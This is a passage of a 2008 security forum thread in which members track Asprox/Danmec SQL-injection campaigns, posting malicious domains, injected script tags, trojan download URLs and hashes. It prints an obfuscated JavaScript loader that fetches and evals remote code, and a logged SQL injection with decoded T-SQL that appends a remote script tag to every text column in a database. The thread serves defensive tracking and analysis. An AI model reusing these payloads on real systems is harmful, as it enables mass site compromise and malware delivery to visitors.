hxxp://www.h-nan.net.cn/f16.swf
hxxp://www.h-nan.net.cn/f28.swf
hxxp://www.h-nan.net.cn/f45.swf
hxxp://www.h-nan.net.cn/f47.swf
hxxp://www.h-nan.net.cn/i115.swf
hxxp://www.h-nan.net.cn/i16.swf
hxxp://www.h-nan.net.cn/i28.swf
hxxp://www.h-nan.net.cn/i45.swf
hxxp://www.h-nan.net.cn/i64.swf
hxxp://www.live322.cn/4561.swf
hxxp://www.live322.cn/4562.swf
hxxp://www.mvoe.cn/all/xmsl3.swf
hxxp://www.mvoe.cn/all/xmsl4.swf
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 05, 2008, 07:05:38 pm: Quote from: MysteryFCM on June 03, 2008, 03:29:47 pm
Ref: mgfcompressors.com

Quote
thanks Steven,
we have deleted the files and asked again our client to move to another
platform for his web portal.

Feel free to send again mail if it happens again.
Regards
Bybit staff

There is something on the server which inserts a malicious script into the homepage on the first time you view it, as Bobby stated. And it seems like the same type of script which you saw inserted in /portal/help/.

Since you have spoken with them before and they said feel free to mail them if it happens again, what do you think the chances are of them taking a little look on the server and giving us the script which is causing this. I would be interested to see it.
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 05, 2008, 08:02:31 pm: I'll get in touch and find out :)
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 05, 2008, 11:58:28 pm: @Bobby,
I've got it decoded as far as the following, adding the vars as the errors borked on them, but it's now borking with an error telling me arguments.callee.toString() is null or not an object?

Code: [Select]
var FuqV=75397; var Z2Yh=73665; var xC=71163; var EjFO='KCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2BKC46KC7UeqKC71KCUeq6KC3BKCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2AKC78KC43KC3BKC76KC61KC72KC20KC6EKC4CKC6UeqKC6AKC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC78KC43KC3BKC76KC61KC72KC20KC76KC76KC3Vn0KC32KC3UeqKC37KC31KC30KC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC6EKC4CKC6UeqKC6AKC2AKC3UeqKC37KC37KC32KC3UeqKC3BKC76KC61KC72KC20KC4BKC4CKC3Vn0KC33KC30KC39KC3UeqKC32KC3B'; eval(unescape(EjFO.replace(/Ueq/g,'5').replace(/KC/g,'%').replace(/Vn0/g,'D'))); FuqV=FuqV+44051; var KL, vv, rz1, pv6x, nLej, xC, Mkmo='Fpo76Fpo61Fpo72Fpo20Fpo72Fpo7AFpo31Fpo3DFpo33Fpo30Fpo33Fpo34Fpo36Fpo3BFpo46Fpo75Fpo71Fpo56Fpo2DFpo2DFpo3BFpo76Fpo61Fpo72Fpo20Fpo44Fpo3DFpo27Fpo33Fpo35Fpo27Fpo3BFpo44Fpo3DFpo44Fpo2BFpo4BFpo4CFpo3B'; eval(unescape(Mkmo.replace(/Fpo/g,'%'))); Z2Yh=Z2Yh%KL; var Pv6c=80606; vv=vv+33901; var xEx=18390; var D; Pv6c=(Pv6c-79890)*(nLej-4095588384); FuqV=FuqV%Z2Yh; nLej=rz1+D; nLej=nLej+xEx; xC=(Pv6c-8575844471)*(vv-59581); D=xC%nLej; var Z3p='0dSmi460dSmi750dSmi710dSmi560dSmi3D0dSmi460dSmi750dSmi710dSmi560dSmixigY50dSmi440dSmi3B0dSmi760dSmi610dSmi7xigY0dSmixigY00dSmi650dSmi640dSmi6A0dSmi760dSmi3D0dSmi410dSmi480dSmi3B'; eval(unescape(Z3p.replace(/ig/g,'z').replace(/0dS/g,'N').replace(/xzY/g,'2').replace(/Nmi/g,'%'))); CvQ=new Array(); var UEma; var mi; for(UEma=0; UEma<256; UEma++) { CvQ[UEma]=UEma; } mi=arguments.callee.toString(); mi=mi.replace(/\W/g,''); mi=mi.toUpperCase(); mi+=FuqV; var z2lP='cqe7ElcqeEl1cqe72cqe2Vcqe53cqe59cqeEl1cqe5cqeJ3DcqeEl5cqeEl4cqeElfcqe7Elcqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe54cqe7cqeJEl3cqe3Dcqe27cqe27cqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe75cqe41cqe3Dcqe31cqe3cqeJ33cqe3B'; eval(unescape(z2lP.replace(/f/g,'A').replace(/V/g,'0').replace(/El/g,'6').replace(/cqe/g,'%').replace(/%J/g,'8%'))); var oGZI; for(oGZI=0; oGZI<mi.length; oGZI++) { uA^=mi.charCodeAt(oGZI); if(oGZI%76==75) { Txc+=String.fromCharCode(uA); uA=183; } } if(oGZI%76!=75) { Txc+=String.fromCharCode(uA); } mi=Txc; var YL=null; var Cpw='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50'; var it='%4D%69%63%72%6F%73%6F%66%74%2E%58%4D%4C%48%54%54%50'; if (!YL) { try { YL=new XMLHttpRequest(); } catch(e) { YL=null } ; } var ejA=unescape(Cpw); if (!YL) { try { YL=new ActiveXObject(ejA); } catch(e) { YL=null } } var zzl=unescape(it); if (!YL) { try { YL=new ActiveXObject(zzl); } catch(e) { YL=null } } var IOom=SYaX; var YH=function() { Oy = unescape(YL.responseText); var XT=0; var ZHev; for(Go=0; Go<256; Go++) { ZHev=Go%mi.length; ZHev=mi.charCodeAt(ZHev); var U; U='9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g12B9A%g148%g165%g176%g13B9A%g148%g165%g176%g13D9894%g12B9A%g148%g165%g176%g13B9894%g13D9A%g148%g165%g176%g120%g125%g120%g132%g135%g136%g13B9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g13B%g143%g176919B%g147%g16F9D%g13D%g143%g176919B98949D%g13B%g143%g176919B98949D%g13D9A%g148%g165%g176%g13B'; eval(unescape(U.replace(/%g/g,'M').replace(/M1/g,'%').replace(/9/g,'%5'))); } qIpP=0; var BUBC; BUBC='daR45daR50daR45daR3DdaR30daR3BdaR76daR6B%daR72daR20daR7B%daR3DdaR27daR27daR3B'; eval(unescape(BUBC.replace(/aR/g,'J').replace(/B%/g,'1').replace(/dJ/g,'%'))); var RbLR; var RmmL; for(RbLR=0; RbLR<Oy.length; RbLR++) { qIpP=qIpP+1; var De; De='G8N1G849G8N0G850G83DG8N1G849G8N0G850G825G832G835G836G83BG845G850G845G83DG845G850G845G82BG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG845G850G845G83DG845G850G845G825G832G835G836G83BG85AG848G865G8N6G83DG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG843G8N6G851G85BG8N1G849G8N0G850G85DG83DG843G8N6G851G85BG845G850G845G85DG83BG843G8N6G851G85BG845G850G845G85DG83DG85AG848G865G8N6G83BG852G86DG86DG84CG83DG843G8N6G851G85BG8N1G849G8N0G850G85DG82BG843G8N6G851G85BG845G850G845G85DG83BG852G86DG86DG84CG83DG852G86DG86DG84CG825G832G835G836G83BG852G86DG86DG84CG83DG843G8N6G851G85BG852G86DG86DG84CG85DG83BG852G86DG86DG84CG83DG84FG8N9G82EG863G868G861G8N2G843G86FG864G865G841G8N4G828G852G862G84CG852G829G85EG852G86DG86DG84CG83BG8N1G82BG83DG853G8N4G8N2G869G86EG86NG82EG866G8N2G86FG86DG843G868G861G8N2G843G86FG864G865G828G852G86DG86DG84CG829G83B'; eval(unescape(De.replace(/N/g,'7').replace(/G8/g,'%') )); } eval(q); } ;var G=function() { if((YL.readyState==4)&&(YL.status==200)) { YH(); } } ;//YL.onreadystatechange=G; YL.open('GET',IOom,true); YL.send(null);
I added // before YL.onready.... just so it would go through with my manual script :) (manual script just over-rides document.write and eval so it dumps it to a file instead)
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 05, 2008, 11:59:32 pm: Btw, AntiVir is detecting my amended version as HTML/Crypted.Gen ...... which is a bit wierd as it completely ignored it prior to my modifying the script to correct the errors thrown by it ..
Title: Re: SQL Injected jscript sites
Post by: bobby on June 06, 2008, 05:30:41 am: Antnet gave here a complete solution for deobfuscating this one:
http://malware-research.co.uk/index.php?topic=8164.0
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 06, 2008, 05:34:04 am: Nice one, cheers :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 06, 2008, 01:53:45 pm: New:
kk6.us
hxxp://www.siteid38.com
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 06, 2008, 05:10:57 pm: Thanks.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on June 08, 2008, 12:34:52 am: <script src=hxxp://www.advertbnr.com/b.js></script>
<script src=hxxp://www.bannerupd.com/b.js></script>
<script src=hxxp://www.cookieadw.com/b.js></script>
<script src=hxxp://www.en-us18.com/b.js></script>
<script src=hxxp://www.refer68.com/b.js></script>
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 08, 2008, 07:54:11 pm: Thanks.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 11, 2008, 06:25:45 pm: Added:

hxxp://www.bigadnet.com
hxxp://www.fengnima.cn
hxxp://www.adsitelo.com
hxxp://www.advabnr.com
hxxp://www.qiqicc.cn

As a reminder, the full list I'm maintaining is at:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 11, 2008, 06:45:17 pm: Thank you YanceySlide.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on June 14, 2008, 05:06:55 am: hxxp://www.jetadwor.com/b.js
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 14, 2008, 06:48:02 pm: Thanks.
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 18, 2008, 01:33:22 am: Google for:
Quote
iframe src=http://www.oiok01.net/s1.htm?
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 27, 2008, 05:55:12 am: Quote
src=http://www.clsiduser.com/b.js
src=http://www.domaincld.com/b.js
src=http://www.updatead.com/b.js

And the following ones...which in contrast with the above,
either they've just started injecting around,or they're older failed attempts...
Quote
src=http://www.app52.com/b.js
src=http://www.asp707.com/b.js
src=http://www.aspx49.com/b.js
src=http://www.aspssl63.com/b.js

Have a nice day... :-*
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 27, 2008, 12:49:37 pm: Sorry, I haven't been updating this thread like I meant to. :(

The following are new as of today:
hxxp://www.adwste.mobi
hxxp://www.bnrupdate.mobi
hxxp://www.adupd.mobi

They're not yet being injected, but they are Danmec/Asprox domains.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 27, 2008, 05:06:59 pm: Four more:
hxxp://www.adwsupp.com
hxxp://www.hdadwcd.com
hxxp://www.kadport.com
hxxp://www.suppadw.com
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 27, 2008, 10:54:08 pm: Thank you :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 30, 2008, 05:21:42 pm: New:
hxxp://www.web923.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 30, 2008, 06:51:57 pm: Four more:
hxxp://www.csl24.com
hxxp://www.get49.net
hxxp://www.pid72.com
hxxp://www.pid76.net
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 30, 2008, 08:24:52 pm: Quote
src=http://www.j8j8hei.cn/k.js -> 235000 sites injected...

The following ones haven't been injected that much yet...
Quote
src=http://www.qq117cc.cn/k.js
src=http://www.qq117cc.cn/ri.js
src=http://www.batch29.com/b.js
src=http://www.dl251.com/b.js
src=http://www.supbnr.com/b.js
src=http://www.hlpgetw.com/b.js
src=http://www.rid34.com/b.js

And the following to be blocked as well...
Quote
hxxp://www.bdsae.org.cn/bdsae/aa.htm?11
hxxp://www.qq117cc.cn/456.htm
hxxp://www.qq117cc.cn/dj.htm
hxxp://bnrupdate.mobi/cgi-bin/index.cgi?ad
hxxp://pid76.net/cgi-bin/index.cgi?ad
hxxp://hdadwcd.com/cgi-bin/index.cgi?ad
hxxp://adupd.mobi/cgi-bin/index.cgi?ad
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 30, 2008, 08:44:46 pm: The following aren't resolving for me atm?

Code: [Select]
Error 9001 - Can't resolve host j8j8hei.cn Error 9001 - Can't resolve host www.j8j8hei.cn Error 9001 - Can't resolve host qq117cc.cn Error 9001 - Can't resolve host www.qq117cc.cn Error 9001 - Can't resolve host qq117cc.cn Error 9001 - Can't resolve host www.qq117cc.cn Error 9001 - Can't resolve host bdsae.org.cn Error 9001 - Can't resolve host www.bdsae.org.cn Error 9001 - Can't resolve host qq117cc.cn Error 9001 - Can't resolve host www.qq117cc.cn Error 9001 - Can't resolve host qq117cc.cn Error 9001 - Can't resolve host www.qq117cc.cn
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 30, 2008, 08:51:04 pm: Heh,they have been rebooted for maintenance or something:
i tried 5 minutes ago and they were down,i tried 2 minutes ago,and they were up...
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 30, 2008, 08:55:11 pm: hehe ya gotta love 'em
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 30, 2008, 09:01:50 pm: Quote from: sowhat-x on June 30, 2008, 08:24:52 pm

Thanks, added the missing ones to my list.

I had been remiss in adding new entries here when I updated http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514 so several got added there that didn't show up here. Sorry about that.
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 30, 2008, 09:06:28 pm: Lol no problem,here's another one for you ;)
Quote
hxxp://www.maigol.cn/ri.js
Very fresh...google returns nada for the time being,he-he...
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 30, 2008, 09:14:35 pm: Quote from: sowhat-x on June 30, 2008, 09:06:28 pm
Lol no problem,here's another one for you ;)
Quote
hxxp://www.maigol.cn/ri.js
Very fresh...google returns nada for the time being,he-he...

Added, thanks!
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 30, 2008, 09:41:16 pm: ...is it my impression,or it seems like Google got fed up with the Asprox guys,
and decided to go...the "hard" way against them,he-he... 8)

Quote
src=http://www.j8j8hei.cn/k.js
-> Now it returns only 14300 results instead of 235000...
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 30, 2008, 11:20:44 pm: Thank you.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 01, 2008, 04:54:02 pm: Quote from: sowhat-x on June 30, 2008, 09:41:16 pm
...is it my impression,or it seems like Google got fed up with the Asprox guys,
and decided to go...the "hard" way against them,he-he... 8)

Quote
src=http://www.j8j8hei.cn/k.js
-> Now it returns only 14300 results instead of 235000...

Try querying some of the other "googles". Like, google.co.uk or google.com.au or google.de. I find I get different counts. google.com has a more aggressive expiry.

Also, new domains this morning:
www.cntrl62.com
www.config73.com
www.default37.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 01, 2008, 05:25:37 pm: www.debug73.com
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 01, 2008, 09:13:13 pm: Thank you.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 02, 2008, 05:41:11 pm: Today's list:
www.canclvr.com
www.ktrcom.com
www.lokriet.com
www.mainbvd.com
www.portwbr.com
www.stiwdd.com
www.testwvr.com
www.ucomddv.com
www.upcomd.com
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 02, 2008, 08:23:25 pm: Thank you :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 03, 2008, 12:38:52 pm: New:
www.adwadb.mobi
www.allocbn.mobi
www.catdbw.mobi
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 03, 2008, 07:24:58 pm: Thanks.
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on July 05, 2008, 02:19:55 pm: Quick'n'dirty list of sites and blogs that have recently posted lists of sql injection sites,
in case we've missed any of them...some of them are frequently updated as well:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
http://infosec20.blogspot.com/2008/06/asprox-sql-injection-botnet-and-iframe.html
http://s3cwatch.wordpress.com/

Ilion's blog is mentioned earlier in the thread...and ShadowServer's wiki obviously :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 07, 2008, 12:42:50 pm: Ugh, this'll teach me to go away for vacation:
www.adbtch.com
www.aladbnr.com
www.apidad.com
www.appdad.com
www.asodbr.com
www.asslad.com
www.blcadw.com
www.blockkd.com
www.bnradd.mobi
www.bnrbasead.com
www.bnrbtch.com
www.browsad.com
www.brsadd.com
www.clrbbd.com
www.dbgbron.com
www.loctenv.com
www.mainadt.com
www.portadrd.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 08, 2008, 04:27:17 pm: New:
www.ausadd.com
www.ausbnr.com
www.crtbond.com
www.gbradw.com
www.usaadp.com
www.usaadw.com
www.usabnr.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 08, 2008, 04:34:14 pm: And:

www.destbnp.com
www.gbradp.com
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 08, 2008, 09:05:59 pm: Thanks.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 09, 2008, 03:09:59 pm: New:
www.adwnetw.com
www.bnsdrv.com
www.butdrv.com
www.cdrpoex.com
www.cliprts.com
www.drvadw.com
www.hdrcom.com
www.loopadd.com
www.movaddw.com
www.nopcls.com
www.pyttco.com
www.tctcow.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 09, 2008, 05:22:38 pm: New:
www.bkpadd.mobi
www.destad.mobi
www.porttw.mobi
www.tertad.mobi
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 11, 2008, 03:26:16 pm: Thank you.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 14, 2008, 02:27:48 pm: Only one new one (for now):
www.gitporg.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 14, 2008, 02:53:12 pm: Oh, hey, some non-asprox domains:
www.google9.info
www.loveqianlai.cn
www.hiwowpp.cn
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 14, 2008, 07:41:24 pm: Meh, two more danmec/asprox:
www.addrl.com
www.adpzo.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 15, 2008, 12:25:17 pm: New danmec:
www.gbradde.tk
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 15, 2008, 07:36:31 pm: Thanks.
Title: Re: SQL Injected jscript sites
Post by: spamislame on July 16, 2008, 03:31:13 pm: I noticed a couple things about these attacks now that a domain I control was recently hit with a variety of exploits (fortunately it's secure against all of them.)

- They only try one type of exploit at a time, and they only attempt it once.
- They use a different ip address for each attempt that they make, indicating that it's a distributed attack and seemingly automated.

The first attack attempted to exploit HORDE, a web mail client, using an outdated and assumedly unpatched version.

All other attacks (three so far) have focused on unpatched or outdated installs of WordPress.

The IP's appear to all be home internet accounts using cable or DSL connections, indicating that the storm infection is behind it (previously discussed, I am sure.)

fyi, if it helps.

SiL
Title: Re: SQL Injected jscript sites
Post by: Orac on July 17, 2008, 04:06:01 pm: Our log entry
Code: [Select]
***.***.***.*** - - [17/Jul/2008:08:13:32 +0000] "GET /forums/index.php?act=attach&type=post&id=125;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E75736572732E35312E6C612F323031363232322E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E75736572732E35312E6C612F323031363232322E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"
Decoded
Code: [Select]
DECLARE @S CHAR(4000);SET @S=CAST (DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://js.users.51.la/2016222.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://js.users.51.la/2016222.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor) AS CHAR(4000));EXEC(@S);
The link, js.users.51.la/2016222.js gives us
Code: [Select]
document.write ('<a href="http://www.51.la/?2016222" target="_blank"><img alt="51.la 专业、免费、强健的访问统计" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n'); // A Popular Free Statistics Service for 100 000+ Webmasters. window.onerror=function(){return true}; document.write ('<script>var a6222tf="51la";var a6222pu="";var a6222pf="51la";var a6222su=window.location;var a6222sf=document.referrer;var a6222of="";var a6222op="";var a6222ops=1;var a6222ot=1;var a6222d=new Date();var a6222color="";if (navigator.appName=="Netscape"){a6222color=screen.pixelDepth;} else {a6222color=screen.colorDepth;}<\/script><script>a6222tf=top.document.referrer;<\/script><script>a6222pu =window.parent.location;<\/script><script>a6222pf=window.parent.document.referrer;<\/script><script>a6222ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a6222ops=(a6222ops==null)?1: (parseInt(unescape((a6222ops)[2]))+1);var a6222oe =new Date();a6222oe.setTime(a6222oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a6222ops+ ";path=/;expires="+a6222oe.toGMTString();a6222ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a6222ot==null){a6222ot=1;}else{a6222ot=parseInt(unescape((a6222ot)[2])); a6222ot=(a6222ops==1)?(a6222ot+1):(a6222ot);}a6222oe.setTime(a6222oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a6222ot+";path=/;expires="+a6222oe.toGMTString();<\/script><script>a6222of=a6222sf;if(a6222pf!=="51la"){a6222of=a6222pf;}if(a6222tf!=="51la"){a6222of=a6222tf;}a6222op=a6222pu;try{lainframe}catch(e){a6222op=a6222su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2016222&tpages=\'+a6222ops+\'&ttimes=\'+a6222ot+\'&tzone=\'+(0-a6222d.getTimezoneOffset()/60)+\'&tcolor=\'+a6222color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a6222of)+\'&vpage=\'+escape(a6222op)+\'" \/>\');<\/script>');
The link in the above code, www.51.la/?2016222 gives us what looks like an automated regestration script
Code: [Select]
<li><a href="reg.asp">ÉêÇë</a></li> <li><a href="login.asp">µÇÂ¼</a></li>
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 17, 2008, 04:22:47 pm: New danmec:
www.adwr.ru
www.bnrc.ru
www.iogp.ru
www.lodse.ru
www.rrcs.ru
www.sdkj.ru
www.sslwer.ru
www.vcre.ru
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 17, 2008, 09:22:50 pm: New danmec:
www.adwbn.ru
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 19, 2008, 05:53:55 pm: Thanks.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on July 21, 2008, 02:16:47 am: <script src=hxxp://stoe.co.kr/img/btn/1.js></script>

<script src=hxxp://www.attadd.com/ngg.js></script>
<script src=hxxp://www.brcporb.ru/ngg.js></script>
<script src=hxxp://www.gb53.ru/ngg.js></script>
<script src=hxxp://www.korfd.ru/ngg.js></script>
<script src=hxxp://www.h23f.ru/ngg.js></script>
<script src=hxxp://www.lkc2.ru/ngg.js></script>
Title: Re: SQL Injected jscript sites
Post by: Orac on July 21, 2008, 04:54:54 pm: Code: [Select]
<script src="http://1.verynx.cn/w.js"></script>
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on July 21, 2008, 05:11:36 pm: Quote
hxxp://www.jvke.ru/ngg.js
hxxp://www.ecx2.ru/ngg.js
Pointing to:
hxxp://nudk.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.jex5.ru/ngg.js
Pointing to:
hxxp://gb53.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.5kc3.ru/ngg.js
hxxp://www.4cnw.ru/ngg.js
hxxp://www.keje.ru/ngg.js
hxxp://www.d5sg.ru/ngg.js
hxxp://www.90mc.ru/ngg.js
Pointing to:
hxxp://4cnw.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.btoperc.ru/ngg.js
hxxp://www.grtsel.ru/ngg.js
Pointing to:
hxxp://h23f.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.o1o2qq.cn/ri.js
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on July 22, 2008, 01:10:32 pm: Quote
hxxp://www.keec.ru/ngg.js
Pointing to:
hxxp://keje.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.9jsr.ru/ngg.js
Pointing to:
hxxp://5kc3.ru/cgi-bin/index.cgi?ad
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 22, 2008, 03:10:52 pm: Thank you.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on July 24, 2008, 02:43:17 pm: <script src=hxxp://www.4vrs.ru/ngg.js></script>
<script src=hxxp://www.bts5.ru/ngg.js></script>
<script src=hxxp://www.cgt4.ru/ngg.js></script>
<script src=hxxp://www.chds.ru/ngg.js></script>
<script src=hxxp://www.cvsr.ru/ngg.js></script>
<script src=hxxp://www.kgj3.ru/ngg.js></script>
<script src=hxxp://www.lksr.ru/ngg.js></script>
<script src=hxxp://abc.verynx.cn/w.js></script>
Title: Re: SQL Injected jscript sites
Post by: Orac on July 24, 2008, 03:35:02 pm: Code: [Select]
<script src="http://abc.verynx.cn/w.js"> <script src="http://1.verynx.cn/w.js"> <script src="http://xunlei.verynx.cn/w.js">
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 26, 2008, 05:45:28 pm: Thanks.
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on August 06, 2008, 06:56:36 pm: Quote
hxxp://jjmaobuduo.3322.org/csrss/w.js
hxxp://jjmaoduo.3322.org/csrss/w.js
hxxp://www.8hcs.ru/js.js
hxxp://www.98hs.ru/js.js
hxxp://www.bgsr.ru/js.js
hxxp://www.bywd.ru/js.js
hxxp://www.ibse.ru/js.js
hxxp://www.ncbw.ru/js.js
hxxp://www.nwj4.ru/js.js
hxxp://www.ojns.ru/js.js
hxxp://www.porv.ru/js.js
hxxp://www.uhwc.ru/js.js

"Main" malware executable that gets dropped from some of the above...
(MD5 -> 68ba2b52c10841ea3d3e5d0982f647d8):
Quote
hxxp://www.plgou.com/csrss/rondll32.exe
And also...
Quote
hxxp://91.203.93.4/cgi-bin/index.cgi?ad
Title: Re: SQL Injected jscript sites
Post by: Serg on August 06, 2008, 11:06:15 pm: ===
"Main" malware executable that gets dropped from some of the above...
(MD5 -> 68ba2b52c10841ea3d3e5d0982f647d8):
===

fukc... what is it? i've never seen that. Chines baidu.com, .ru sites and rootkits + unreachable admin page on 246.114.180.29:7854....
pls add this admin page
Code: [Select]
http://www.plgou.com/csrss/ack.htmland trojans from that
Code: [Select]
http://www.plgou.com/comine/sss.exe http://www.plgou.com/comine/beauty.exe http://www.plgou.com/comine/sl.exe http://www.plgou.com/comine/server.exe
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on August 06, 2008, 11:34:12 pm: Regarding the dropped rondll32.exe above...
http://s3cwatch.wordpress.com/2008/08/06/

Didn't really bothered digging more on the dropped exes to be honest,
spent more time trying to dig newer "injection" domains per se...

Edit:Thought i should add the hashes from the rest of .exes as well...
Quote
846790691B6F9717B9A1BF68E0BCD6E5 -> sss.exe
C1D6F2020EA16FA73CF70F522A7ECFD6 -> beauty.exe
82686A1AB42882AE0E40B863E79E6E33 -> sl.exe
526FEEE3909E18DB7D8AA567019B7C2C -> server.exe
Title: Re: SQL Injected jscript sites
Post by: Orac on August 07, 2008, 11:11:54 am: One from todays logs on one of our servers

Log entry, IP address obfuscated for privacy.
Code: [Select]
